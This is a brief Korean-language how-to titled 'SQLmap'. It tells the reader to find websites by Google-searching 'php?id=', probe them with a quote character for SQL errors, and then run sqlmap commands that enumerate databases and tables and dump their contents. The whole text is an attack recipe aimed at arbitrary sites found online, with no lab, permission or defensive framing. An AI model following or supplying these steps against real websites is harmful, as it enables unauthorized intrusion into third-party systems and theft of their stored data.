SQLmap

SQLmap


1. google 에서 php?id= 으로 검색

2. 사이트 진입후 주소창 맨뒤 ' 입력후 sql 오류 문구 나오는지 확인

3. ' 를 제외한 주소 복사

4. 터미널 입력

# sqlmap -u http://xxx.xx/aa.php?id=11 --dbs

5. DB 목록 나오는지 확인

# sqlmap -u http://xxx.xx/aa.php?id=11 -D [DB명] --tables

6. Table 목록 나오는지 확인

# sqlmap -u http://xxx.xx/aa.php?id=11 -D [DB명] -T [Table명] --dump